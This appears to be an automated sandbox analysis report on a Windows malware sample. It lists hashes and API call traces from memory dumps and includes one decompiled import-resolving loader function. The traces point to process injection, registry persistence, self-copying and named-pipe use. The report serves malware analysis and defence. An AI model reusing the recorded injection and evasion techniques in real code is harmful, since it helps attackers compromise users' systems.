  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
